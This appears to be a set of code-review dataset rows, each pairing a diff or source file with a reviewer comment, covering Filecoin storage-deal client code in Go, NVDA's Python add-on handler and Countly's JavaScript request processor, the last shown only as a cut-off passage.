miner, } if smc.isMaybeDupDeal(ctx, proposal) && !allowDuplicates { return nil, Errors[ErrDuplicateDeal] } // see if we managed to connect to the miner err = <-minerAlive if err == net.ErrPingSelf { return nil, errors.New("attempting to make storage deal with self. This is currently unsupported. Please use a separate go-filecoin node as client") } else if err != nil { return nil, err } // Always set payer because it is used for signing proposal.Payment.Payer = fromAddress // create payment information totalCost := price.MulBigInt(big.NewInt(int64(pieceSize * duration))) if totalCost.GreaterThan(types.ZeroAttoFIL) { // The payment setup requires that the payment is mined into a block, currently we // will wait for at most 5 blocks to be mined before giving up ctxPaymentSetup, cancel := context.WithTimeout(ctx, 5*smc.api.BlockTime()) defer cancel() cpResp, err := smc.api.CreatePayments(ctxPaymentSetup, porcelain.CreatePaymentsParams{ From: fromAddress, To: minerOwner, Value: totalCost, Duration: duration, MinerAddress: miner, CommP: pieceCommitmentResponse.CommP, PaymentInterval: VoucherInterval, PieceSize: types.NewBytesAmount(pieceSize), ChannelExpiry: *chainHeight.Add(types.NewBlockHeight(duration + ChannelExpiryInterval)), GasPrice: types.NewAttoFIL(big.NewInt(CreateChannelGasPrice)), GasLimit: types.NewGasUnits(CreateChannelGasLimit), }) if err != nil { return nil, errors.Wrap(err, "error creating payment") } proposal.Payment.Channel = cpResp.Channel proposal.Payment.PayChActor = address.PaymentBrokerAddress proposal.Payment.ChannelMsgCid = &cpResp.ChannelMsgCid proposal.Payment.Vouchers = cpResp.Vouchers } signedProposal, err := proposal.NewSignedProposal(fromAddress, smc.api) if err != nil { return nil, err } // send proposal var response storagedeal.SignedResponse // We reset the context to not timeout to allow large file transfers // to complete. err = smc.ProtocolRequestFunc(ctx, makeDealProtocol, pid, smc.host, signedProposal, &response) if err != nil { return nil, errors.Wrap(err, "error sending proposal") } if err := smc.checkDealResponse(ctx, &response, minerWorker); err != nil { return nil, errors.Wrap(err, "response check failed") } // Note: currently the miner requests the data out of band if err := smc.recordResponse(ctx, &response, miner, signedProposal, pieceCommitmentResponse.CommP); err != nil { return nil, errors.Wrap(err, "failed to track response") } smc.log.Debugf("proposed deal for: %s, %v\n", miner.String(), proposal) return &response, nil } func (smc *Client) recordResponse(ctx context.Context, resp *storagedeal.SignedResponse, miner address.Address, p *storagedeal.SignedProposal, commP types.CommP) error { proposalCid, err := convert.ToCid(p) if err != nil { return errors.New("failed to get cid of proposal") } if !proposalCid.Equals(resp.ProposalCid) { return fmt.Errorf("cids not equal %s %s", proposalCid, resp.ProposalCid) } _, err = smc.api.DealGet(ctx, proposalCid) if err == nil { return fmt.Errorf("deal [%s] is already in progress", proposalCid.String()) } if err != porcelain.ErrDealNotFound { return errors.Wrapf(err, "failed to check for existing deal: %s", proposalCid.String()) } return smc.api.DealPut(&storagedeal.Deal{ Miner: miner, Proposal: p, Response: resp, CommP: commP, }) } func (smc *Client) checkDealResponse(ctx context.Context, resp *storagedeal.SignedResponse, workerAddr address.Address) error { valid, err := resp.VerifySignature(workerAddr) if err != nil { return errors.Wrap(err, "Could not verify response signature") } if !valid { return errors.New("Response signature is invalid") } switch resp.State { case storagedeal.Rejected: return fmt.Errorf("deal rejected: %s", resp.Message) case storagedeal.Failed: return fmt.Errorf("deal failed: %s", resp.Message) case storagedeal.Accepted: return nil default: return fmt.Errorf("invalid proposal response: %s", resp.State) } } func (smc *Client) minerForProposal(ctx context.Context, c cid.Cid) (address.Address, error) { storageDeal, err := smc.api.DealGet(ctx, c) if err != nil { return address.Undef, errors.Wrapf(err, "failed to fetch deal: %s", c) } return storageDeal.Miner, nil } // QueryDeal queries an in-progress proposal. func (smc *Client) QueryDeal(ctx context.Context, proposalCid cid.Cid) (*storagedeal.SignedResponse, error) { mineraddr, err := smc.minerForProposal(ctx, proposalCid) if err != nil { return nil, err } workerAddr, err := smc.api.MinerGetWorkerAddress(ctx, mineraddr) if err != nil { return nil, err } minerpid, err := smc.api.MinerGetPeerID(ctx, mineraddr) if err != nil { return nil, err } q := storagedeal.QueryRequest{Cid: proposalCid} var resp storagedeal.SignedResponse err = smc.ProtocolRequestFunc(ctx, queryDealProtocol, minerpid, smc.host, q, &resp) if err != nil { return nil, errors.Wrap(err, "error querying deal") } valid, err := resp.VerifySignature(workerAddr) if err != nil { return nil, err } if !valid { return nil, errors.New("deal response has invalid signature") } return &resp, nil } func (smc *Client) isMaybeDupDeal(ctx context.Context, p *storagedeal.Proposal) bool { dealsCh, err := smc.api.DealsLs(ctx) if err != nil { return false } for d := range dealsCh { if d.Deal.Miner == p.MinerAddress && d.Deal.Proposal.PieceRef.Equals(p.PieceRef) { return true } } return false } // LoadVouchersForDeal loads vouchers from disk for a given deal func (smc *Client) LoadVouchersForDeal(ctx context.Context, dealCid cid.Cid) ([]*types.PaymentVoucher, error) { storageDeal, err := smc.api.DealGet(ctx, dealCid) if err != nil { return []*types.PaymentVoucher{}, errors.Wrapf(err, "could not retrieve deal with proposal CID %s", dealCid) } return storageDeal.Proposal.Payment.Vouchers, nil } // MakeProtocolRequest makes a request and expects a response from the host using the given protocol. func MakeProtocolRequest(ctx context.Context, protocol protocol.ID, peer peer.ID, host host.Host, request interface{}, response interface{}) error { s, err := host.NewStream(ctx, peer, protocol) if err != nil { if err == multistream.ErrNotSupported { return errors.New("could not establish connection with peer. Peer does not support protocol") } return errors.Wrap(err, "failed to establish connection with the peer") } if err := cbu.NewMsgWriter(s).WriteMsg(request); err != nil { return errors.Wrap(err, "failed to write request") } if err := cbu.NewMsgReader(s).ReadMsg(response); err != nil { return errors.Wrap(err, "failed to read response") } return nil }
1
20,924
I don't know where this came from, but it's not a good idea. This is actually timing out after 5 rounds, not 5 blocks. 5 consecutive null blocks won't be that uncommon. Also when testing with a short block time, this is a very short duration that can contribute to flaky tests.
filecoin-project-venus
go
@@ -47,7 +47,8 @@ def loadState(): global state statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: - state = cPickle.load(file(statePath, "r")) + with open(statePath, "r") as f: + state = cPickle.load(f) if "disabledAddons" not in state: state["disabledAddons"] = set() if "pendingDisableSet" not in state:
1
# -*- coding: UTF-8 -*- #addonHandler.py #A part of NonVisual Desktop Access (NVDA) #Copyright (C) 2012-2019 Rui Batista, NV Access Limited, Noelia Ruiz Martínez, Joseph Lee, Babbage B.V., Arnold Loubriat #This file is covered by the GNU General Public License. #See the file COPYING for more details. import sys import os.path import gettext import tempfile import inspect import itertools import collections import pkgutil import shutil from six.moves import cStringIO as StringIO, cPickle from six import string_types import globalVars import zipfile from configobj import ConfigObj from configobj.validate import Validator import config import globalVars import languageHandler from logHandler import log import winKernel import addonAPIVersion from . import addonVersionCheck from .addonVersionCheck import isAddonCompatible MANIFEST_FILENAME = "manifest.ini" stateFilename="addonsState.pickle" BUNDLE_EXTENSION = "nvda-addon" BUNDLE_MIMETYPE = "application/x-nvda-addon" NVDA_ADDON_PROG_ID = "NVDA.Addon.1" ADDON_PENDINGINSTALL_SUFFIX=".pendingInstall" DELETEDIR_SUFFIX=".delete" state={} # addons that are blocked from running because they are incompatible _blockedAddons=set() def loadState(): global state statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: state = cPickle.load(file(statePath, "r")) if "disabledAddons" not in state: state["disabledAddons"] = set() if "pendingDisableSet" not in state: state["pendingDisableSet"] = set() if "pendingEnableSet" not in state: state["pendingEnableSet"] = set() except: # Defaults. state = { "pendingRemovesSet":set(), "pendingInstallsSet":set(), "disabledAddons":set(), "pendingEnableSet":set(), "pendingDisableSet":set(), } def saveState(): statePath=os.path.join(globalVars.appArgs.configPath,stateFilename) try: cPickle.dump(state, file(statePath, "wb")) except: log.debugWarning("Error saving state", exc_info=True) def getRunningAddons(): """ Returns currently loaded addons. """ return getAvailableAddons(filterFunc=lambda addon: addon.isRunning) def getIncompatibleAddons( currentAPIVersion=addonAPIVersion.CURRENT, backCompatToAPIVersion=addonAPIVersion.BACK_COMPAT_TO): """ Returns a generator of the add-ons that are not compatible. """ return getAvailableAddons( filterFunc=lambda addon: ( not addonVersionCheck.isAddonCompatible( addon, currentAPIVersion=currentAPIVersion, backwardsCompatToVersion=backCompatToAPIVersion ) )) def completePendingAddonRemoves(): """Removes any addons that could not be removed on the last run of NVDA""" user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) pendingRemovesSet=state['pendingRemovesSet'] for addonName in list(pendingRemovesSet): addonPath=os.path.join(user_addons,addonName) if os.path.isdir(addonPath): addon=Addon(addonPath) try: addon.completeRemove() except RuntimeError: log.exception("Failed to remove %s add-on"%addonName) continue pendingRemovesSet.discard(addonName) def completePendingAddonInstalls(): user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) pendingInstallsSet=state['pendingInstallsSet'] for addonName in pendingInstallsSet: newPath=os.path.join(user_addons,addonName) oldPath=newPath+ADDON_PENDINGINSTALL_SUFFIX try: os.rename(oldPath,newPath) except: log.error("Failed to complete addon installation for %s"%addonName,exc_info=True) pendingInstallsSet.clear() def removeFailedDeletions(): user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) for p in os.listdir(user_addons): if p.endswith(DELETEDIR_SUFFIX): path=os.path.join(user_addons,p) shutil.rmtree(path,ignore_errors=True) if os.path.exists(path): log.error("Failed to delete path %s, try removing manually"%path) _disabledAddons = set() def disableAddonsIfAny(): """ Disables add-ons if told to do so by the user from add-ons manager. This is usually executed before refreshing the list of available add-ons. """ global _disabledAddons # Pull in and enable add-ons that should be disabled and enabled, respectively. state["disabledAddons"] |= state["pendingDisableSet"] state["disabledAddons"] -= state["pendingEnableSet"] _disabledAddons = state["disabledAddons"] state["pendingDisableSet"].clear() state["pendingEnableSet"].clear() def initialize(): """ Initializes the add-ons subsystem. """ if config.isAppX: log.info("Add-ons not supported when running as a Windows Store application") return loadState() removeFailedDeletions() completePendingAddonRemoves() completePendingAddonInstalls() # #3090: Are there add-ons that are supposed to not run for this session? disableAddonsIfAny() getAvailableAddons(refresh=True) saveState() def terminate(): """ Terminates the add-ons subsystem. """ pass def _getDefaultAddonPaths(): """ Returns paths where addons can be found. For now, only <userConfig\addons is supported. @rtype: list(string) """ addon_paths = [] user_addons = os.path.abspath(os.path.join(globalVars.appArgs.configPath, "addons")) if os.path.isdir(user_addons): addon_paths.append(user_addons) return addon_paths def _getAvailableAddonsFromPath(path): """ Gets available add-ons from path. An addon is only considered available if the manifest file is loaded with no errors. @param path: path from where to find addon directories. @type path: string @rtype generator of Addon instances """ log.debug("Listing add-ons from %s", path) for p in os.listdir(path): if p.endswith(DELETEDIR_SUFFIX): continue addon_path = os.path.join(path, p) if os.path.isdir(addon_path) and addon_path not in ('.', '..'): if not len(os.listdir(addon_path)): log.error("Error loading Addon from path: %s", addon_path) else: log.debug("Loading add-on from %s", addon_path) try: a = Addon(addon_path) name = a.manifest['name'] log.debug( "Found add-on {name} - {a.version}." " Requires API: {a.minimumNVDAVersion}." " Last-tested API: {a.lastTestedNVDAVersion}".format( name=name, a=a )) if a.isDisabled: log.debug("Disabling add-on %s", name) if not isAddonCompatible(a): log.debugWarning("Add-on %s is considered incompatible", name) _blockedAddons.add(a.name) yield a except: log.error("Error loading Addon from path: %s", addon_path, exc_info=True) _availableAddons = collections.OrderedDict() def getAvailableAddons(refresh=False, filterFunc=None): """ Gets all available addons on the system. @param refresh: Whether or not to query the file system for available add-ons. @type refresh: bool @param filterFunc: A function that allows filtering of add-ons. It takes an L{Addon} as its only argument and returns a C{bool} indicating whether the add-on matches the provided filter. @type filterFunc: callable @rtype generator of Addon instances. """ if filterFunc and not callable(filterFunc): raise TypeError("The provided filterFunc is not callable") if refresh: _availableAddons.clear() generators = [_getAvailableAddonsFromPath(path) for path in _getDefaultAddonPaths()] for addon in itertools.chain(*generators): _availableAddons[addon.path] = addon return (addon for addon in _availableAddons.itervalues() if not filterFunc or filterFunc(addon)) def installAddonBundle(bundle): """Extracts an Addon bundle in to a unique subdirectory of the user addons directory, marking the addon as needing install completion on NVDA restart.""" addonPath = os.path.join(globalVars.appArgs.configPath, "addons",bundle.manifest['name']+ADDON_PENDINGINSTALL_SUFFIX) bundle.extract(addonPath) addon=Addon(addonPath) # #2715: The add-on must be added to _availableAddons here so that # translations can be used in installTasks module. _availableAddons[addon.path]=addon try: addon.runInstallTask("onInstall") except: log.error("task 'onInstall' on addon '%s' failed"%addon.name,exc_info=True) del _availableAddons[addon.path] addon.completeRemove(runUninstallTask=False) raise AddonError("Installation failed") state['pendingInstallsSet'].add(bundle.manifest['name']) saveState() return addon class AddonError(Exception): """ Represents an exception coming from the addon subsystem. """ class AddonBase(object): """The base class for functionality that is available both for add-on bundles and add-ons on the file system. Subclasses should at least implement L{manifest}. """ @property def name(self): return self.manifest['name'] @property def version(self): return self.manifest['version'] @property def minimumNVDAVersion(self): return self.manifest.get('minimumNVDAVersion') @property def lastTestedNVDAVersion(self): return self.manifest.get('lastTestedNVDAVersion') class Addon(AddonBase): """ Represents an Add-on available on the file system.""" def __init__(self, path): """ Constructs an L[Addon} from. @param path: the base directory for the addon data. @type path: string """ self.path = os.path.abspath(path) self._extendedPackages = set() manifest_path = os.path.join(path, MANIFEST_FILENAME) with open(manifest_path) as f: translatedInput = None for translatedPath in _translatedManifestPaths(): p = os.path.join(self.path, translatedPath) if os.path.exists(p): log.debug("Using manifest translation from %s", p) translatedInput = open(p, 'r') break self.manifest = AddonManifest(f, translatedInput) @property def isPendingInstall(self): """True if this addon has not yet been fully installed.""" return self.path.endswith(ADDON_PENDINGINSTALL_SUFFIX) @property def isPendingRemove(self): """True if this addon is marked for removal.""" return not self.isPendingInstall and self.name in state['pendingRemovesSet'] def requestRemove(self): """Markes this addon for removal on NVDA restart.""" if self.isPendingInstall: self.completeRemove() state['pendingInstallsSet'].discard(self.name) #Force availableAddons to be updated getAvailableAddons(refresh=True) else: state['pendingRemovesSet'].add(self.name) # There's no point keeping a record of this add-on pending being disabled now. # However, if the addon is in _disabledAddons, then it needs to stay there so that # the status in addonsManager continues to say "disabled" state['pendingDisableSet'].discard(self.name) saveState() def completeRemove(self,runUninstallTask=True): if runUninstallTask: try: # #2715: The add-on must be added to _availableAddons here so that # translations can be used in installTasks module. _availableAddons[self.path] = self self.runInstallTask("onUninstall") except: log.error("task 'onUninstall' on addon '%s' failed"%self.name,exc_info=True) finally: del _availableAddons[self.path] tempPath=tempfile.mktemp(suffix=DELETEDIR_SUFFIX,dir=os.path.dirname(self.path)) try: os.rename(self.path,tempPath) except (WindowsError,IOError): raise RuntimeError("Cannot rename add-on path for deletion") shutil.rmtree(tempPath,ignore_errors=True) if os.path.exists(tempPath): log.error("Error removing addon directory %s, deferring until next NVDA restart"%self.path) # clean up the addons state. If an addon with the same name is installed, it should not be automatically # disabled / blocked. log.debug("removing addon {} from _disabledAddons/_blockedAddons".format(self.name)) _disabledAddons.discard(self.name) _blockedAddons.discard(self.name) saveState() def addToPackagePath(self, package): """ Adds this L{Addon} extensions to the specific package path if those exist. This allows the addon to "run" / be available because the package is able to search its path, looking for particular modules. This is used by the following: - `globalPlugins` - `appModules` - `synthDrivers` - `brailleDisplayDrivers` @param package: the python module representing the package. @type package: python module. """ # #3090: Ensure that we don't add disabled / blocked add-ons to package path. # By returning here the addon does not "run"/ become active / registered. if self.isDisabled or self.isBlocked: return extension_path = os.path.join(self.path, package.__name__) if not os.path.isdir(extension_path): # This addon does not have extension points for this package return # Python 2.x doesn't properly handle unicode import paths, so convert them before adding. converted_path = self._getPathForInclusionInPackage(package) package.__path__.insert(0, converted_path) self._extendedPackages.add(package) log.debug("Addon %s added to %s package path", self.manifest['name'], package.__name__) def enable(self, shouldEnable): """Sets this add-on to be disabled or enabled when NVDA restarts.""" if shouldEnable: if not isAddonCompatible(self): import addonAPIVersion raise AddonError( "Add-on is not compatible:" " minimum NVDA version {}, last tested version {}," " NVDA current {}, NVDA backwards compatible to {}".format( self.manifest['minimumNVDAVersion'], self.manifest['lastTestedNVDAVersion'], addonAPIVersion.CURRENT, addonAPIVersion.BACK_COMPAT_TO ) ) if self.name in state["pendingDisableSet"]: # Undoing a pending disable. state["pendingDisableSet"].discard(self.name) else: state["pendingEnableSet"].add(self.name) else: if self.name in state["pendingEnableSet"]: # Undoing a pending enable. state["pendingEnableSet"].discard(self.name) # No need to disable an addon that is already disabled. # This also prevents the status in the add-ons dialog from saying "disabled, pending disable" elif self.name not in state["disabledAddons"]: state["pendingDisableSet"].add(self.name) # Record enable/disable flags as a way of preparing for disaster such as sudden NVDA crash. saveState() @property def isRunning(self): return not (globalVars.appArgs.disableAddons or self.isPendingInstall or self.isDisabled or self.isBlocked) @property def isDisabled(self): return self.name in _disabledAddons @property def isBlocked(self): return self.name in _blockedAddons @property def isPendingEnable(self): return self.name in state["pendingEnableSet"] @property def isPendingDisable(self): return self.name in state["pendingDisableSet"] def _getPathForInclusionInPackage(self, package): extension_path = os.path.join(self.path, package.__name__) return extension_path.encode("mbcs") def loadModule(self, name): """ loads a python module from the addon directory @param name: the module name @type name: string @returns the python module with C[name} @rtype python module """ log.debug("Importing module %s from plugin %s", name, self.name) importer = pkgutil.ImpImporter(self.path) loader = importer.find_module(name) if not loader: return None # Create a qualified full name to avoid modules with the same name on sys.modules. fullname = "addons.%s.%s" % (self.name, name) try: return loader.load_module(fullname) except ImportError: # in this case return None, any other error throw to be handled elsewhere return None def getTranslationsInstance(self, domain='nvda'): """ Gets the gettext translation instance for this addon. <addon-path<\locale will be used to find .mo files, if exists. If a translation file is not found the default fallback null translation is returned. @param domain: the tranlation domain to retrieve. The 'nvda' default should be used in most cases. @returns: the gettext translation class. """ localedir = os.path.join(self.path, "locale") return gettext.translation(domain, localedir=localedir, languages=[languageHandler.getLanguage()], fallback=True) def runInstallTask(self,taskName,*args,**kwargs): """ Executes the function having the given taskName with the given args and kwargs in the addon's installTasks module if it exists. """ if not hasattr(self,'_installTasksModule'): self._installTasksModule=self.loadModule('installTasks') if self._installTasksModule: func=getattr(self._installTasksModule,taskName,None) if func: func(*args,**kwargs) def getDocFilePath(self, fileName=None): """Get the path to a documentation file for this add-on. The file should be located in C{doc\lang\file} inside the add-on, where C{lang} is the language code and C{file} is the requested file name. Failing that, the language without country is tried. English is tried as a last resort. An add-on can specify a default documentation file name via the docFileName parameter in its manifest. @param fileName: The requested file name or C{None} for the add-on's default. @type fileName: basestring @return: The path to the requested file or C{None} if it wasn't found. @rtype: basestring """ if not fileName: fileName = self.manifest["docFileName"] if not fileName: return None docRoot = os.path.join(self.path, "doc") lang = languageHandler.getLanguage() langs = [lang] if "_" in lang: lang = lang.split("_", 1)[0] langs.append(lang) if lang != "en": langs.append("en") for lang in langs: docFile = os.path.join(docRoot, lang, fileName) if os.path.isfile(docFile): return docFile return None def getCodeAddon(obj=None, frameDist=1): """ Returns the L{Addon} where C{obj} is defined. If obj is None the caller code frame is assumed to allow simple retrieval of "current calling addon". @param obj: python object or None for default behaviour. @param frameDist: howmany frames is the caller code. Only change this for functions in this module. @return: L{Addon} instance or None if no code does not belong to a add-on package. @rtype: C{Addon} """ global _availableAddons if obj is None: obj = sys._getframe(frameDist) fileName = inspect.getfile(obj) dir= unicode(os.path.abspath(os.path.dirname(fileName)), "mbcs") # if fileName is not a subdir of one of the addon paths # It does not belong to an addon. for p in _getDefaultAddonPaths(): if dir.startswith(p): break else: raise AddonError("Code does not belong to an addon package.") curdir = dir while curdir not in _getDefaultAddonPaths(): if curdir in _availableAddons.keys(): return _availableAddons[curdir] curdir = os.path.abspath(os.path.join(curdir, "..")) # Not found! raise AddonError("Code does not belong to an addon") def initTranslation(): addon = getCodeAddon(frameDist=2) translations = addon.getTranslationsInstance() # Point _ to the translation object in the globals namespace of the caller frame # FIXME: shall we retrieve the caller module object explicitly? try: callerFrame = inspect.currentframe().f_back callerFrame.f_globals['_'] = translations.ugettext # Install our pgettext function. callerFrame.f_globals['pgettext'] = languageHandler.makePgettext(translations) finally: del callerFrame # Avoid reference problems with frames (per python docs) def _translatedManifestPaths(lang=None, forBundle=False): if lang is None: lang = languageHandler.getLanguage() # can't rely on default keyword arguments here. langs=[lang] if '_' in lang: langs.append(lang.split('_')[0]) if lang!='en' and not lang.startswith('en_'): langs.append('en') sep = "/" if forBundle else os.path.sep return [sep.join(("locale", lang, MANIFEST_FILENAME)) for lang in langs] class AddonBundle(AddonBase): """ Represents the contents of an NVDA addon suitable for distribution. The bundle is compressed using the zip file format. Manifest information is available without the need for extraction.""" def __init__(self, bundlePath): """ Constructs an L{AddonBundle} from a filename. @param bundlePath: The path for the bundle file. """ self._path = bundlePath if isinstance(bundlePath, unicode) else unicode(bundlePath, "mbcs") # Read manifest: translatedInput=None with zipfile.ZipFile(self._path, 'r') as z: for translationPath in _translatedManifestPaths(forBundle=True): try: translatedInput = z.open(translationPath, 'r') break except KeyError: pass self._manifest = AddonManifest(z.open(MANIFEST_FILENAME), translatedInput=translatedInput) if self.manifest.errors is not None: _report_manifest_errors(self.manifest) raise AddonError("Manifest file has errors.") def extract(self, addonPath): """ Extracts the bundle content to the specified path. The addon will be extracted to L{addonPath} @param addonPath: Path where to extract contents. @type addonPath: string """ with zipfile.ZipFile(self._path, 'r') as z: for info in z.infolist(): if isinstance(info.filename, str): # #2505: Handle non-Unicode file names. # Most archivers seem to use the local OEM code page, even though the spec says only cp437. # HACK: Overriding info.filename is a bit ugly, but it avoids a lot of code duplication. info.filename = info.filename.decode("cp%d" % winKernel.kernel32.GetOEMCP()) z.extract(info, addonPath) @property def manifest(self): """ Gets the manifest for the represented Addon. @rtype: AddonManifest """ return self._manifest def __repr__(self): return "<AddonBundle at %s>" % self._path def createAddonBundleFromPath(path, destDir=None): """ Creates a bundle from a directory that contains a a addon manifest file.""" basedir = os.path.abspath(path) # If caller did not provide a destination directory name # Put the bundle at the same level of the addon's top directory, # That is, basedir/.. if destDir is None: destDir = os.path.dirname(basedir) manifest_path = os.path.join(basedir, MANIFEST_FILENAME) if not os.path.isfile(manifest_path): raise AddonError("Can't find %s manifest file." % manifest_path) with open(manifest_path) as f: manifest = AddonManifest(f) if manifest.errors is not None: _report_manifest_errors(manifest) raise AddonError("Manifest file has errors.") bundleFilename = "%s-%s.%s" % (manifest['name'], manifest['version'], BUNDLE_EXTENSION) bundleDestination = os.path.join(destDir, bundleFilename) with zipfile.ZipFile(bundleDestination, 'w') as z: # FIXME: the include/exclude feature may or may not be useful. Also python files can be pre-compiled. for dir, dirnames, filenames in os.walk(basedir): relativePath = os.path.relpath(dir, basedir) for filename in filenames: pathInBundle = os.path.join(relativePath, filename) absPath = os.path.join(dir, filename) z.write(absPath, pathInBundle) return AddonBundle(bundleDestination) def _report_manifest_errors(manifest): log.warning("Error loading manifest:\n%s", manifest.errors) class AddonManifest(ConfigObj): """ Add-on manifest file. It contains metadata about an NVDA add-on package. """ configspec = ConfigObj(StringIO( """ # NVDA Add-on Manifest configuration specification # Add-on unique name name = string() # short summary (label) of the add-on to show to users. summary = string() # Long description with further information and instructions description = string(default=None) # Name of the author or entity that created the add-on author = string() # Version of the add-on. Should preferably in some standard format such as x.y.z version = string() # The minimum required NVDA version for this add-on to work correctly. # Should be less than or equal to lastTestedNVDAVersion minimumNVDAVersion = apiVersion(default="0.0.0") # Must be greater than or equal to minimumNVDAVersion lastTestedNVDAVersion = apiVersion(default="0.0.0") # URL for more information about the add-on. New versions and such. url= string(default=None) # Name of default documentation file for the add-on. docFileName = string(default=None) # NOTE: apiVersion: # Eg: 2019.1.0 or 0.0.0 # Must have 3 integers separated by dots. # The first integer must be a Year (4 characters) # "0.0.0" is also valid. # The final integer can be left out, and in that case will default to 0. E.g. 2019.1 """)) def __init__(self, input, translatedInput=None): """ Constructs an L{AddonManifest} instance from manifest string data @param input: data to read the manifest informatinon @type input: a fie-like object. @param translatedInput: translated manifest input @type translatedInput: file-like object """ super(AddonManifest, self).__init__(input, configspec=self.configspec, encoding='utf-8', default_encoding='utf-8') self._errors = None val = Validator({"apiVersion":validate_apiVersionString}) result = self.validate(val, copy=True, preserve_errors=True) if result != True: self._errors = result elif True != self._validateApiVersionRange(): self._errors = "Constraint not met: minimumNVDAVersion ({}) <= lastTestedNVDAVersion ({})".format( self.get("minimumNVDAVersion"), self.get("lastTestedNVDAVersion") ) self._translatedConfig = None if translatedInput is not None: self._translatedConfig = ConfigObj(translatedInput, encoding='utf-8', default_encoding='utf-8') for k in ('summary','description'): val=self._translatedConfig.get(k) if val: self[k]=val @property def errors(self): return self._errors def _validateApiVersionRange(self): lastTested = self.get("lastTestedNVDAVersion") minRequiredVersion = self.get("minimumNVDAVersion") return minRequiredVersion <= lastTested def validate_apiVersionString(value): from configobj.validate import ValidateError if not isinstance(value, string_types): raise ValidateError('Expected an apiVersion in the form of a string. EG "2019.1.0"') try: tuple = addonAPIVersion.getAPIVersionTupleFromString(value) return tuple except ValueError as e: raise ValidateError('"{}" is not a valid API Version string: {}'.format(value, e))
1
25,483
In Python 3 when pickling or unpickling objects, the file needs to be opened as binary so that no text encoding/decoding takes place. So for any open calls around pickle loads or dumps, the mode for reading must be rb and the mode for writing must be wb.
nvaccess-nvda
py
@@ -2068,7 +2068,7 @@ const processRequest = (params) => { } else { if (params.qstring.event && params.qstring.event.startsWith('[CLY]_group_')) { - validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups, params.qstring.method); + validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups); } else { params.truncateEventValuesList = true;
1
/** * Module for processing data passed to Countly * @module api/utils/requestProcessor */ const Promise = require('bluebird'); const url = require('url'); const common = require('./common.js'); const countlyCommon = require('../lib/countly.common.js'); const { validateUser, validateRead, validateUserForRead, validateUserForWrite, validateGlobalAdmin, dbUserHasAccessToCollection, validateUpdate, validateDelete, validateCreate } = require('./rights.js'); const authorize = require('./authorizer.js'); const taskmanager = require('./taskmanager.js'); const plugins = require('../../plugins/pluginManager.js'); const versionInfo = require('../../frontend/express/version.info'); const packageJson = require('./../../package.json'); const log = require('./log.js')('core:api'); const fs = require('fs'); var countlyFs = require('./countlyFs.js'); var path = require('path'); const validateUserForWriteAPI = validateUser; const validateUserForDataReadAPI = validateRead; const validateUserForDataWriteAPI = validateUserForWrite; const validateUserForGlobalAdmin = validateGlobalAdmin; const validateUserForMgmtReadAPI = validateUser; var loaded_configs_time = 0; const countlyApi = { data: { usage: require('../parts/data/usage.js'), fetch: require('../parts/data/fetch.js'), events: require('../parts/data/events.js'), exports: require('../parts/data/exports.js'), geoData: require('../parts/data/geoData.js') }, mgmt: { users: require('../parts/mgmt/users.js'), apps: require('../parts/mgmt/apps.js'), appUsers: require('../parts/mgmt/app_users.js'), eventGroups: require('../parts/mgmt/event_groups.js') } }; const reloadConfig = function() { return new Promise(function(resolve) { var my_time = Date.now(); var reload_configs_after = common.config.reloadConfigAfter || 10000; //once in minute if (loaded_configs_time === 0 || (my_time - loaded_configs_time) >= reload_configs_after) { plugins.loadConfigs(common.db, () => { loaded_configs_time = my_time; resolve(); }, true); } else { resolve(); } }); }; /** * Default request processing handler, which requires request context to operate. Check tcp_example.js * @static * @param {params} params - for request context. Minimum needed properties listed * @param {object} params.req - Request object, should not be empty and should contain listed params * @param {string} params.req.url - Endpoint URL that you are calling. May contain query string. * @param {object} params.req.body - Parsed JSON object with data (same name params will overwrite query string if anything provided there) * @param {APICallback} params.APICallback - API output handler. Which should handle API response * @returns {void} void * @example * //creating request context * var params = { * //providing data in request object * 'req':{"url":"/i", "body":{"device_id":"test","app_key":"APP_KEY","begin_session":1,"metrics":{}}}, * //adding custom processing for API responses * 'APICallback': function(err, data, headers, returnCode, params){ * //handling api response, like sending to client or verifying * if(err){ * //there was problem processing request * console.log(data, returnCode); * } * else{ * //request was processed, let's handle response data * handle(data); * } * } * }; * * //processing request * processRequest(params); */ const processRequest = (params) => { if (!params.req || !params.req.url) { return common.returnMessage(params, 400, "Please provide request data"); } const urlParts = url.parse(params.req.url, true), queryString = urlParts.query, paths = urlParts.pathname.split("/"); /** * Main request processing object containing all information shared through all the parts of the same request * @typedef params * @type {object} * @global * @property {string} href - full URL href * @property {res} res - nodejs response object * @property {req} req - nodejs request object * @param {APICallback} params.APICallback - API output handler. Which should handle API response * @property {object} qstring - all the passed fields either through query string in GET requests or body and query string for POST requests * @property {string} apiPath - two top level url path, for example /i/analytics * @property {string} fullPath - full url path, for example /i/analytics/dashboards * @property {object} files - object with uploaded files, available in POST requests which upload files * @property {string} cancelRequest - Used for skipping SDK requests, if contains true, then request should be ignored and not processed. Can be set at any time by any plugin, but API only checks for it in beggining after / and /sdk events, so that is when plugins should set it if needed. Should contain reason for request cancelation * @property {boolean} bulk - True if this SDK request is processed from the bulk method * @property {array} promises - Array of the promises by different events. When all promises are fulfilled, request counts as processed * @property {string} ip_address - IP address of the device submitted request, exists in all SDK requests * @property {object} user - Data with some user info, like country geolocation, etc from the request, exists in all SDK requests * @property {object} app_user - Document from the app_users collection for current user, exists in all SDK requests after validation * @property {object} app_user_id - ID of app_users document for the user, exists in all SDK requests after validation * @property {object} app - Document for the app sending request, exists in all SDK requests after validation and after validateUserForDataReadAPI validation * @property {ObjectID} app_id - ObjectID of the app document, available after validation * @property {string} app_cc - Selected app country, available after validation * @property {string} appTimezone - Selected app timezone, available after validation * @property {object} member - All data about dashboard user sending the request, exists on all requests containing api_key, after validation through validation methods * @property {timeObject} time - Time object for the request */ params.href = urlParts.href; params.qstring = params.qstring || {}; params.res = params.res || {}; params.urlParts = urlParts; params.paths = paths; //request object fillers params.req.method = params.req.method || "custom"; params.req.headers = params.req.headers || {}; params.req.socket = params.req.socket || {}; params.req.connection = params.req.connection || {}; //copying query string data as qstring param if (queryString) { for (let i in queryString) { params.qstring[i] = queryString[i]; } } //copying body as qstring param if (params.req.body && typeof params.req.body === "object") { for (let i in 